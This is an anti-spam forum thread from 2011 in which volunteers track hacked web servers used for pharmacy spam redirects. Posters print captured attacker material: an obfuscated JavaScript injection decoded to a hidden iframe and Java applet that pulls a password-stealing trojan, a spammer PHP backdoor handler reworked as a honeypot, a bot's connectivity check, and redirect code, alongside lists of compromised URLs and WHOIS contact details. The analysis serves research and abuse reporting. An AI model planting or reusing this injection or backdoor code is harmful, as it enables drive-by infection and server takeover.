Compromised hosts

Any research, news or information regarding the wide variety of techniques criminals use to take over your computers or web servers.

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 5:04 pm

spamislame wrote:Huh.

You originally lost me about here:

Amouse wrote:hXXp://sidneilino.com.br/relief/heavy/ Tag in top level Hacked by Mhiman Hnc > tabletscapsulesdrugstore.net
Special note. The above web site may be trying to drop a file on browsers machines.
hXXp://silverdutchman.nl/Media/strong/

Extra info from Mhiman tag.

Domain Name:HACKER-NEWBIE.ORG

Huh.

http://sidneilino.com.br/

Code: Select all
===================================================================
-__Status : Deface
-__Nick : Mhiman HNc
-__Forum : Hacker-Newbie.org
-__Notice For Admin : Check Ur Security
-__Mhiman note Messege : Don't Panic Your Database Safe
-__Thanks For : Onestree[IHT],Up_[HNc]Jahat[HNc],N4is3N[HNc],l1n6g4[HNc],All my Hacker-newbie.org And All Indonesian Hacker Team
-=-[ Hacker-newbie.org ]-=-

He's posted this to one other server, rupagroup.net, but they took it down.

Have you contacted the operator or the hosting company of that site? Might be worth asking how they got in.

hacker-newbie.org is hosted on IP 180.235.148.57, located in Tangerang, Banten, Indonesia.

SiL

P.S.: Also check out these files on that compromised host:

http://sidneilino.com.br/relief/412c1ec8358dabd85428d95019f250fa.che
http://sidneilino.com.br/relief/584c175287019332837633e29bea1a55.che

SiL

I normally only contact .nz site owners.

How they got in... SQLI or RFI is the most common.

The .che may be related to this below... I will have a look at the code later.

http://www.zlham.geek.nz/wiki/radio/ind ... on=history

Which is what they were doing on my wiki. I think it is all related but do not know for sure...
Or maybe SEO spam which I have other info on that I need to post.
The attack on my wiki is easy to track due to the history file... altushost.com
altushost is still probing my sever and complaining to the commie with the girls name only saw me get loaded with spam from a bot net to the point that I had to close the email address.

ICQ: 380125121
MSN: info at altushost.com
Skype: AltusHost
YIM: altus at ymail.com
Registrant Name:Nikola Tanaskovic
Registrant Organization:AltusHost.com
Registrant Street3:Glavna BB
Registrant City:Donja Borina
Registrant State/Province:Macvanski
Registrant Postal Code:15317
Registrant Country:RS
Registrant Phone:+381.628300062
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:nikolatanas at gmail.com
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 8:11 pm

My bad... The 40000 figure is the number of messages sent by 5 servers in the two spam runs.
For a total number one would have to multiply the number of sending URL's 1286 by 2259 times 18.
Which is about 52 million messages over about two days. That is if every hacked machine had a spam bot on it.

The capture file on my server is 46 mega bytes but a lot of this is generated on the machine with code.
None the less, a spam bot of this nature is generating a lot of traffic on the net. A lot of that traffic is random garbage to filter bust.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby AlphaCentauri » Mon Jan 17, 2011 11:50 pm

If you want them to take action, there's no point insulting them. If you don't expect them to take action, there's no point emailing them.

The folks on abuse desks get a ton of emails. Some of the reports are multiple copies of automated reports, or reports from people fooled by joe jobs, or rants from mentally ill people. They don't have time to research everything. Some people's reports will be ignored just because the staff don't have time to work through them all.

If you want them to take your reports seriously, you have to provide firm evidence and be clear and concise about how your evidence proves they should take action against a paying customer based on the word of some random person (you) who emailed them. I mean, I can't even follow everything you're saying. Most of the people on abuse desks don't know nearly as much about spammers as the average member on this forum. We have to educate them, and once they've been insulted, their minds close and they become unreceptive to new information.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Compromised hosts

Postby Amouse » Tue Jan 18, 2011 8:50 pm

More spammer code... Plus my phoney code. Maybe I just invented a word... php honey pot, phoney for short.

So my pet php spammer has checked my servers connectivity with the following code.
This code is loaded dynamically and is most likely used for statistics and or a connectivity check.
It sets up a curl http browser, connects to a site and returns the time taken for the http response.
This would give a rough estimate of the bandwidth the hacked server has.
Any error is returned.

First for SIL here is the code used to snatch the spammers request and dump it to file.
This is one file you do not have and corresponds to the file /hack/bup/google4c586ed9b7a165ff.php
It got away from the tgz as I wrote it in the www directory and missed copying it over.
On my server I have replaced this spammer file with my phoney file with the same name.
If you recall there are two types of googlexxxx files on hacked servers. One is a hacker shell that allows the hacker to access the file system etc.. The other is a general purpose file that allows the hacker to execute code. This phoney code is based on this file as per above. If you do not have copy and you want one let me know and I will post it.

Filename: /hack/mycode/google4c586ed9b7a165ff.php
Discription: php honey pot code to grab get variables and write to file. eval, write and move functions have been replaced with file write to capture data.

Code: Select all
<!--<?php
$myFile = "load.txt";
$fh = fopen($myFile, 'a') or die("can't open file");

fwrite($fh, "\n\r Session Start");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "\n\r " . $ip);
fwrite($fh, "\n\r " . $_SERVER['REQUEST_URI'] . " \n\r");

if(@$_REQUEST['cookies']==1){
 echo '--'.'><i>Goog1e_analist_certs</i><br>';
 if(@$_REQUEST['e']){fwrite($fh, "\n\r " . base64_decode($_REQUEST['e']));}
 elseif(@$_FILES['f']['name']){fwrite($fh, "\n\r f tmp name =" .($_FILES['f']['tmp_name'] . " fp=".  @$_REQUEST['fp'] . "f name" . $_FILES['f']['name']));}
 elseif(@$_REQUEST['nn']){fwrite($fh, "\n\r nn=" . @$_REQUEST['nn'] . " nd = " .  @$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){fwrite($fh, "\n\r fc=" . $_REQUEST['fc']);}}
 else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']);
$pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./';
 echo chr(118).chr(46).chr(46). "true";
 }echo '<!'.'--';
}
?>-->


Next here is the result captured to file load.txt Note the IP address has been seen before on my server.
It may be a Cisco Router as the rDNS suggests and a nmap scan may support this but I am no expert.
The code from "function to exit;" is the http get variable &e=(urlencoded string)

Code: Select all
Session Start
 91.211.16.126
 /images/google4c586ed9b7a165ff.php?cookies=1

 function c_get_page($url, $pst='', $referer='', $getonlyhead=0) {
        $uagent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';

        $ch = curl_init($url);
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

        if(!$getonlyhead) {
                curl_setopt($ch,CURLOPT_HEADER,0);
        } else {
                curl_setopt($ch,CURLOPT_HEADER,1);
                curl_setopt($ch,CURLOPT_NOBODY,TRUE);
        }

        curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($ch,CURLOPT_ENCODING,'');
        curl_setopt($ch,CURLOPT_USERAGENT,$uagent);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,30);
        curl_setopt($ch,CURLOPT_TIMEOUT,30);
        curl_setopt($ch,CURLOPT_MAXREDIRS,3);
        curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

        curl_setopt($ch,CURLOPT_FAILONERROR,1); //!@#
        curl_setopt($ch,CURLOPT_AUTOREFERER,0);

        if($referer){curl_setopt($ch,CURLOPT_REFERER,$referer);}
        if($pst){curl_setopt($ch,CURLOPT_POSTFIELDS,$pst);}

        $content = curl_exec($ch);
        $err     = curl_errno($ch);
        $errmsg  = curl_error($ch);
        $header  = curl_getinfo($ch);
        curl_close($ch);

        $st='';
        if($errmsg){
                echo str_repeat('-',70)."\r\n"."** REMOTE ** CURLERR: $errmsg\r\n".str_repeat('-',70)."\r\n";
        } else {
                $st=$header['total_time'];
        }

        return $st;
}

$st=c_get_page("http://google.co.uk/");
if(!$st){$st='ERR';}

echo md5(1010);
echo $st;
echo md5(1011);

exit;


So next big problem is Mr Spammer knows the file on my server did not give the right result. To mitigate this I am hoping Mr Spammer will double check by doing the same thing again. More phoney code is required.
This code will only work properly if Mr Spammer fires the same code again at my server. Note the final exit has been removed as I suspect the eval() routine will only return with it thereby completing the final output format. Since the code below runs without being inside the eval() routine the exist must be removed.

Filename: /hack/mycode/google4c586ed9b7a165ff-phoney.php

Code: Select all
<!--<?php
$myFile = "load.txt";
$fh = fopen($myFile, 'a') or die("can't open file");

fwrite($fh, "\n\r Session Start");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "\n\r " . $ip);
fwrite($fh, "\n\r " . $_SERVER['REQUEST_URI'] . " \n\r");



if(@$_REQUEST['cookies']==1){
echo '--'.'><i>Goog1e_analist_certs</i><br>';
if(@$_REQUEST['e']){fwrite($fh, "\n\r " . base64_decode($_REQUEST['e']));

 function c_get_page($url, $pst='', $referer='', $getonlyhead=0) {
        $uagent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';

        $ch = curl_init($url);
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

        if(!$getonlyhead) {
                curl_setopt($ch,CURLOPT_HEADER,0);
        } else {
                curl_setopt($ch,CURLOPT_HEADER,1);
                curl_setopt($ch,CURLOPT_NOBODY,TRUE);
        }

        curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
        curl_setopt($ch,CURLOPT_ENCODING,'');
        curl_setopt($ch,CURLOPT_USERAGENT,$uagent);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,30);
        curl_setopt($ch,CURLOPT_TIMEOUT,30);
        curl_setopt($ch,CURLOPT_MAXREDIRS,3);
        curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

        curl_setopt($ch,CURLOPT_FAILONERROR,1); //!@#
        curl_setopt($ch,CURLOPT_AUTOREFERER,0);

        if($referer){curl_setopt($ch,CURLOPT_REFERER,$referer);}
        if($pst){curl_setopt($ch,CURLOPT_POSTFIELDS,$pst);}

        $content = curl_exec($ch);
        $err     = curl_errno($ch);
        $errmsg  = curl_error($ch);
        $header  = curl_getinfo($ch);
        curl_close($ch);

        $st='';
        if($errmsg){
                echo str_repeat('-',70)."\r\n"."** REMOTE ** CURLERR: $errmsg\r\n".str_repeat('-',70)."\r\n";
        } else {
                $st=$header['total_time'];
        }

        return $st;
}

$st=c_get_page("http://google.co.uk/");
if(!$st){$st='ERR';}

echo md5(1010);
echo $st;
echo md5(1011);

}
elseif(@$_FILES['f']['name']){fwrite($fh, "\n\r f tmp name =" .($_FILES['f']['tmp_name'] . " fp=". @$_REQUEST['fp'] . "f name" . $_FILES['f']['name']));}
elseif(@$_REQUEST['nn']){fwrite($fh, "\n\r nn=" . @$_REQUEST['nn'] . " nd = " .  @$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){fwrite($fh, "\n\r fc=" . $_REQUEST['fc']);}}
else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']);
$pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./';
echo chr(118).chr(46).chr(46). "true";
}echo '<!'.'--';}
?>-->


The returned html source code looks like this.

Code: Select all
<!----><i>Goog1e_analist_certs</i><br>1e48c4420b7073bc11916c6c1de226bb1.1266687f975a56c761db6506eca0b37ce6ec87<!---->


Like some coders these hackers only do just enough to do the job and I have not seen any great sophistication or going that extra mile to ensure nobody, a sneaky Anony Mouse, compromises the php bot army.

I have not seen any separate spam runs involving some of the army. All runs seem to be all or nothing however I am certain there are many threads as url capture files do not match up synchronously and also with the bots being monitored there is often times when only one bot sees one url as shown by the ration of total url's to unique url's.

Spammer code is not infallible and there are many things that can cause a *FAIL*.
Mr Spammer probably has a profile of my machine. This is a basic so lib curl would be a known factor but still if lib curl were removed the result would be *FAIL* and maybe enough doubt exists in Mr Spammers mind to test again. I will just have to wait and see what happens next.

To date I find that the checks and balances that the structure implemented by these hacker/spammers have not been able to discover anything amiss despite files being missing at times and incorrect responses when I have needed to capture data to allow me to write phoney code. Now that was a mouth full.

In other words I think it is a good idea to keep monitoring and gathering data on this php bot net.
From experience I know spammy likes operating in cloudy water... Perhaps some of the data I have gathered helps make things a little less cloudy.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby Amouse » Thu Jan 20, 2011 6:51 am

Standard warning: If you do not know what you are doing do not follow any links from spam or stuff I investigate. I run Linux and IDS. I am very experienced dealing with virus and other nasty things.

hXXp://www.elboukayli.com/store/images/ < Danger exploit script.

I have visited a few sites and note some of the sites have exploit scripts installed in some of the directories.

Code: Select all
<script type="text/javascript">
document.write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065
\u003D\u0022 \u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070
\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u006B\u0069\u0074\u0065\u0067\u0065\u0061
\u0072\u0065\u0078\u0063\u0068\u0061\u006E\u0067\u0065\u002E\u0063\u006F\u006D\u002F
\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068
\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030
\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E
\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072
\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064
\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068
\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046
\u0052\u0041\u004D\u0045\u003E\u000D');
</script>


Decodes to this...

Code: Select all
<IFRAME NAME="x" SRC="hXXp://www.kitegearexchange.com/new.htm" width="0" height="0" scrolling="no" frameborder="0" marginwidth="1" marginheight="1" ></IFRAME>U+000D <control> character


So we go grab that htm file and we see...

Code: Select all
<html>
<body>
<applet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">
      <param name="url" value="hXXp://www.kitegearexchange.com/host.exe">
</applet>
  </p>
  <p></p>
</div>
</body></html>
<IFRAME src="hXXp://www.mavi1.org/forum" width=0 height=0 frameborder=0></IFRAME>


The owner of this site gets notified if the exploit gets run.

Domain Name:MAVI1.ORG
Created On:01-Sep-2007 15:09:17 UTC
Last Updated On:03-Oct-2010 14:44:36 UTC
Expiration Date:01-Sep-2013 15:09:17 UTC
Sponsoring Registrar:Reg2C.com Inc. (R1358-LROR)
Status:OK
Registrant ID:DI_11887269
Registrant Name:SIYAMI OZKAN -(246817)
Registrant Organization:MUSAVIR
Registrant Street1:RESAT TABAK IS MERKEZI
Registrant Street2:NO 30
Registrant City:CANAKKALE
Registrant State/Province:MERKEZ
Registrant Postal Code:17100
Registrant Country:TR
Registrant Phone:+286.2328514
Registrant Phone Ext.:
Registrant FAX:+286.2328514
Registrant Email:dursunustam@yahoo.com.tr

hXXp://www.mavi1.org. 14023 IN CNAME mavi1.org.
mavi1.org. 14024 IN A 212.7.200.227 < Also DNS1 & 2 same ip

person: Dino Strzeminski
address: Dediserv Dedicated Servers Sp z o.o.
address: ul. Jaracza 3/49
address: 00-378 Warsaw
address: Poland
phone: +48 221001361
nic-hdl: DS7840-RIPE

person: Marcin Krupinski
address: 43370 Szczyrk, Gorska 24
phone: +48 338178011

clamscan *
forum: OK
Hidden.jar: OK
host.exe: Trojan.Magania-9679 FOUND
new.htm: OK

Trojan-PSW:W32/Magania is a large family of login/password stealing trojans that are reportedly made in China. The main purpose of the trojan is to steal logons and passwords from users who play on-line games, provided by Gamania.

It should be noted that some on-line games allow users to sell their character's possessions for real cash, so the motivation behind the creation of such trojans is to steal virtual goods and to convert those goods into real-world cash.
Amouse
Spam Reporter
 
Posts: 140
Joined: Sat Jun 13, 2009 11:34 pm

Re: Compromised hosts

Postby Red Dwarf » Thu Jan 20, 2011 5:56 pm

The owner of the kitegearexchange.com web site said that he has long ago canceled it with StartLogic, but his suppliers have failed to take it offline. It has since been compromised in the usual way, and the trojan added into the site server root directory
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

Hijacked images

Postby Red Dwarf » Fri Jan 21, 2011 5:14 pm

Spam for viagra has started to include links to images sitting on other servers. Some examples from the past 24 hours -

Code: Select all
www.concilioshop.net/bannersitem/viagra.gif
www.maryammohebbi.com/viagra.jpg
www.pillenpharm.com/img/cat_images/viagra_generic_h.jpg
www.vidrin.com/images/logoviagra.jpg


This is not a case of hijacked servers. It is a case of hijacked images.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am


Re: Compromised hosts

Postby Red Dwarf » Wed Jan 26, 2011 5:45 am

They try to evade blacklisting and registrar suspension by spamming redirections from compromised web servers. Examples from Jan 25 2011:
adidasboxing.msk.ru/k.html
beton.internetdsl.pl/csm.html
cancan.romportal.ro/kxc.html
cason.neostrada.pl/qzwuvyny.html
empe3net7.neostrada.pl/rvwarr.html
empe3net9.neostrada.pl/ivhfgn.html
eticsa.com.ar/pzw.html
fut.edu.pl/fw.html
kvlvwiekevorst.freehostia.com/mijiurz.html
mebel.neostrada.pl/x.html
qedimbaki.wen.su/byenmwl.html
showftp.ehc.hu/uco.html
sibtknet.83.com1.ru/glypysw.html
tupamaros.com.co/jjcwj.html
wederkoms.50webs.com/s.html
dreamsofagirl.kit.net/yzzoutdl.html
greatcasinosports.co.uk/o.html
legacyhides.co.za/omluumo.html
memlauer.user.icpnet.pl/rfirtagb.html
minouklim.com/qmyo.html
yes007.by.ru/qugasl.html
zsp2.neostrada.pl/ua.html

Target: lodmedic.com
Domain Name: LODMEDIC.COM
Registrar: ENOM, INC. and Registration Service Provided By: Namecheap.com
Registrant from Russia
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Wed Jan 26, 2011 5:53 am

Compromised server and added redirection -

lumieresmedia.co.uk/2uz6ck21.html
lumieresmedia.co.uk/gj5qbe2d.html
lumieresmedia.co.uk/ore2zln5.html

Target - drugstoremedspharmacyprofession.eu - Canadian Health&Care Mall

Report to lumieresmedia.co.uk/contact-us.html info@lumieresmedia.co.uk
By Phone 0161 660 2003
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Wed Jan 26, 2011 5:52 pm

E-Star Computers, Australia

Intrusions spammed this week

estarcomputers.com.au/03yycha4.html
estarcomputers.com.au/0q8ggf7y.html
estarcomputers.com.au/0wfzfdgm.html
estarcomputers.com.au/16krnt1z.html
estarcomputers.com.au/6q0jcdx7.html
estarcomputers.com.au/b2tiseij.html
estarcomputers.com.au/bch607jk.html
estarcomputers.com.au/cq63necu.html
estarcomputers.com.au/duyk3who.html
estarcomputers.com.au/ewvwvnb9.html
estarcomputers.com.au/gb10vq7.html
estarcomputers.com.au/gv1893u.html
estarcomputers.com.au/igz3u028.html
estarcomputers.com.au/oay2ja.html
estarcomputers.com.au/op8d4do.html
estarcomputers.com.au/p9xl735.html
estarcomputers.com.au/qi53l.html
estarcomputers.com.au/qiu3nxno.html
estarcomputers.com.au/tmanyg7.html
estarcomputers.com.au/ukj63z5r.html
estarcomputers.com.au/vcb9vhn.html
estarcomputers.com.au/wbujs1h9.html
estarcomputers.com.au/ygdwf6fw.html

Redirection code
<meta http-equiv='refresh' content='0;url=http://tabletenlargementpillsdrugstore.eu'
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Red Dwarf » Sun Jan 30, 2011 6:32 pm

Spammed in the past hour, all leading to Pharmacy Express fraud at lodmedic.com using
Code: Select all
meta HTTP-EQUIV="REFRESH" content="0; url=http://lodmedic.com"


acea.rapidwebservice.net/lhm.html
adidasboxing.msk.ru/aneecwsz.html
astro21.by.ru/py.html
cre.ehc.hu/xgqzuv.html
fut.edu.pl/gulqoozu.html
kudowa.internetdsl.pl/okb.html
kuznya.home.nov.ru/mmcpazdy.html
legacyhides.co.za/ok.html
ochrona.internetdsl.pl/hqullnu.html
ochrona.internetdsl.pl/ulhswr.html
orci.or.tz/lzm.html
pcxmda.com/ozm.html
qedimbaki.wen.su/qsrrrn.html
qingye.50webs.com/j.html
rodam.com.mx/ytfmcwsw.html
showftp.ehc.hu/vkgo.html
sibtknet.83.com1.ru/ncpcwtj.html
sosdinheiro.kit.net/ab.html
tarentaalrandsafari.co.za/cmk.html
telbit.internetdsl.pl/bm.html
ua0ljj.bdk.com.ru/ozpo.html
winx.kport.info/v.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10539
Joined: Tue Jun 27, 2006 2:01 am

Re: Compromised hosts

Postby Amouse » Mon Jan 31, 2011 12:14 am

Just over 1,000 URL's in the spam run ending on the 30th.
The spam run lasted over 48 hours.
After the spam run the bot net master
sent a new redirector page. In my case
the new redirect page was the same as
the last one.

On one of the machines I have investigated I found a new file.
This file is a large shell with advanced features.
Encoded this file is over 309K and decoded 231K.
That is quite a bit of code.

Code: Select all
hXXp://1000cigarettes.com/gal/explode/struggle.html
hXXp://1oakmule.com/dru/shudder/melt.html
hXXp://3d-tvs.com.au/images/ceiling/actually.html
hXXp://501usa.net/demo/fake/north.html
hXXp://accountingsoftware.my/css/field/statue.html
hXXp://adaep.com/test/whistle/silence.html
hXXp://adamkornfield.com/css/forgive/occur.html
hXXp://adsandends.co.za/temp/yeah/they.html
hXXp://affilidir.net/detail/meal/attention.html
hXXp://afghan-dinner.dk/cp/cage/garage.html
hXXp://aftermarketglobal.com/download/atmosphere/perform.html
hXXp://airsoft.neonet.sk/images/want.html
hXXp://akud-medpharm.de/shop/images/detail.html
hXXp://amdprocessors.com/templates_41eed9ca121c541ec7b28defb6c3b632/long/terrible.html
hXXp://ammahdavi.com/shop/interest.html
hXXp://angeleyes.no/images/shoulder.html
hXXp://annasstallbod.se/modlogan/suck/department.html
hXXp://armenianfairytales.com/tickets/images/universe.html
hXXp://artempano.com.br/virtualstore/images/gentleman.html
hXXp://artisansofthecoast.com/wp-includes/claw/there.html
hXXp://asnshopandearn.com/images/steam.html
hXXp://aspiradorasjuarez.com/images/single/extremely.html
hXXp://autoshop101.ca/machine/usual/camp.html
hXXp://avonbridal.co.nz/ab_gallery/food/position.html
hXXp://avtocenter-uzmah.si/flash/possible/hate.html
hXXp://bahiachateauguay.com/rocky/somewhere/rate.html
hXXp://baldwinsart.com/art/images/servant.html
hXXp://barbie-magazine.it/wp-admin/meat/activity.html
hXXp://bazardomotel.com.br/179/proceed/squint.html
hXXp://beautynature.net/60a75b2f0b18d5d6a95de3d89b76e4fc3e147972/throw/silver.html
hXXp://beliiy.com/tpl/flow/rest.html
hXXp://benkornfield.com/images/thrust/decide.html
hXXp://best-buys.us/images/access.html
hXXp://BESTONTHEMIC.COM/manager/mouth/hush.html
hXXp://bidlister.com/banners/back/blade.html
hXXp://bighornsheep.com.tw/product/images/toward(s).html
hXXp://bijkaatjeaandedijk.nl/webwinkel/images/loose.html
hXXp://bikeman.com.br/loja/images/routine.html
hXXp://bioaurabeautiful.com/images/life/spend.html
hXXp://bodyhealthmart.com/20100531-0aeb/last/native.html
hXXp://book.alterat.net/images/dress.html
hXXp://boschrandguestfarm.com/new/motor/bullet.html
hXXp://braydenc.com/images/thumb/flush.html
hXXp://buying.mlithk.com/images/silk.html
hXXp://calculator.au.com/blog/than/serious.html
hXXp://caltechfund.org/_notes/weep/twenty.html
hXXp://canadub.com/language/shame/fortune.html
hXXp://caralarmtoday.com/Cart/images/practice.html
hXXp://casinoloyal.nl/images/craft/football.html
hXXp://ccendlessmts.org/e107_docs/aware/clay.html
hXXp://cctvmty.com/catalogo/images/think.html
hXXp://cefibol.com/ofertas/images/taste.html
hXXp://ceria.com.au/images/briefcase/alongside.html
hXXp://cfcunai.com/images/neat.html
hXXp://chicago.serversecured.net/~classico/shops/images/dress.html
hXXp://chrissydanielsonline.com/store/images/route.html
hXXp://cieenza.com/language/rescue/meat.html
hXXp://circean.com.au/curtain/scramble/disturb.html
hXXp://cititribe.com/css_images/those/suddenly.html
hXXp://cofres.biz/images/asshole.html
hXXp://coolgadgetsdepot.ca/email/retire/sand.html
hXXp://credithomeloan.com.au/images/chew/image.html
hXXp://ct-bodyscience.com/images/hawk/believe.html
hXXp://czasnazegarek.pl/images/very.html
hXXp://damcenter.it/imagebrowser/date/person.html
hXXp://darkkabaret.com/swf/another/desk.html
hXXp://decors.biz/i2/sack/bottle.html
hXXp://dedomibooks.com/rumble/light/tall.html
hXXp://demo.opensourcedemos.net/tiddlywiki/depth/surely.html
hXXp://demo.rahshop.com/images/icons/bureau/darken.html
hXXp://detecteursradars.com/images/result/gaze.html
hXXp://digiflex.com.br/loja/images/division.html
hXXp://digitalspycamera.co.uk/catalogue/difficult/gentle.html
hXXp://dimina.fi/admin/door/leap.html
hXXp://directorysubmissions.com.au/scripts/merely/sister.html
hXXp://dissect.co.za/sohoadmin/asleep/engine.html
hXXp://dobra-ksiazka.eu/sklep/images/banners/statue/torch.html
hXXp://download.abc-ictservices.nl/speeltuin/corner/land.html
hXXp://draaistelfm.nl/images/chance/tell.html
hXXp://dreamsjewels.com/os3/images/<beep>.html
hXXp://drivinglessonsliversedge.co.uk/images/breeze.html
hXXp://dseo.com.my/rankings/apply/deny.html
hXXp://ecoleconduite2000.com/assets/path/guilty.html
hXXp://edelweiss-care.com/images/short/slice.html
hXXp://edible-gold.com/images/categories/push/fake.html
hXXp://elcajonsecreto.com/peliculas/images/next.html
hXXp://e-legal.com.ua/wp-includes/loose/wash.html
hXXp://elettronicamegastore.com/includes/<beep>/short.html
hXXp://emporiocalifornia.com/images/speech.html
hXXp://eshop.apinformatica.biz/images/banners/return/forth.html
hXXp://eshop.comics.it/images/default/raise/surface.html
hXXp://eshop.cucitomadone.it/images/graphs/forgive/deep.html
hXXp://eshop.dalrigattiere.it/images/default/push/eventually.html
hXXp://eshop.depurcasa.eu/images/default/around/somebody.html
hXXp://eshop.fenegro.com/images/icons/concern/halfway.html
hXXp://eshop.justfirme.com/images/graphs/trade/perfectly.html
hXXp://eshop.mondocucito.com/images/default/footstep/blue.html
hXXp://eshop.radionasillo.it/images/graphs/relax/entirely.html
hXXp://eshop.solelunaonlus.org/images/default/suicide/five.html
hXXp://eshop.stampaonlinedigitale.com/images/default/whenever/grunt.html
hXXp://eshop.terrepicene.info/images/graphs/possible/suitcase.html
hXXp://eurodesignstudio.org/career.html
hXXp://evawater.co.za/SpryAssets/model/carry.html
hXXp://exoflorindia.com/images/peel/bang.html
hXXp://exquisiteses.com.mx/recetas/bitch/silver.html
hXXp://ezion.com.au/images/call.html
hXXp://fan.my/includes/four/request.html
hXXp://farmfreshtexas.com/Cart/images/receiver.html
hXXp://ferreteriawam.com/images/miss.html
hXXp://findmeaphotographer.com.au/cache/country/mouse.html
hXXp://findmeaprinter.com.au/test/long/sting.html
hXXp://fishinggroundbait.nl/catalog/images/flee.html
hXXp://fiveonlinecup.com/Scripts/bend/soft.html
hXXp://flicview.com/templates/shirt/highly.html
hXXp://floridascooterparts.com/images/even.html
hXXp://folhaeflor.com.br/loja/grave.html
hXXp://fortevendas.com.br/boletos/powerful/night.html
hXXp://francoseguros.com/listas/file/plane.html
hXXp://fulloffool.com/catalog/images/default/official/worry.html
hXXp://gadgetcube.net/images/fine.html
hXXp://galaxyroyale.com/images/reverse/always.html
hXXp://gamal-mubarak.com/languages/debris/plate.html
hXXp://game-webshop.co.uk/images/paint.html
hXXp://gardenfurniturewooden.co.za/images/Friday/forever.html
hXXp://gem-crm.com/class_hXXp/assure/impression.html
hXXp://goniva.net/wp-includes/priest/bartender.html
hXXp://gpstrackindo.com/images/matrox/close/despite.html
hXXp://graco.com.ua/wp-includes/argument/clever.html
hXXp://green-music.biz/images/stone.html
hXXp://greyloans.com.au/images/chief/shaft.html
hXXp://groupmm.com.br/loja/images/screenplay.html
hXXp://harahdesigns.com/images/throat.html
hXXp://hasanalansari.com/wp-includes/interest/trip.html
hXXp://haslo.com.pl/oferta/wine.html
hXXp://hbskiclub.org/rvsincludefile/individual/university.html
hXXp://heatersandcoolers4u.co.uk/images/because.html
hXXp://hilight.com.au/flash/someone/hospital.html
hXXp://ho-fung.com/images/must.html
hXXp://homeloans-mortgages.com.au/images/load/important.html
hXXp://hqlaptop.com/images/officer.html
hXXp://hrewheelsusa.com/extras/focus/state.html
hXXp://hrmatters.co.za/other/hall/mission.html
hXXp://hsdesign.me/noforgiveness/more/water.html
hXXp://huttendorp.nl/AFB/casually/tight.html
hXXp://iglobay.com/store/images/rabbit.html
hXXp://ilienci.com/images/worker.html
hXXp://illusiveonline.net/crisace/images/exchange.html
hXXp://inbali.co.za/Images/area/finish.html
hXXp://inffocell.com.br/179/nine/whatever.html
hXXp://infocia.com.br/lojacia/images/united.html
hXXp://ingenierosedec.com/tienda/images/once.html
hXXp://inovaction.ca/_Images/lone/alone.html
hXXp://instaprint.org/doc/smile/starling.html
hXXp://interactionprojects.com/images/gesture.html
hXXp://isbelltractor.com/saleitems.old/dirt/design.html
hXXp://it-matrix.net/sinallidemo/stagger/stain.html
hXXp://jaboomasoft.com/programming/noise/proper.html
hXXp://jacklynsgiftshop.net/images/channel.html
hXXp://javamedia.net/store/images/street.html
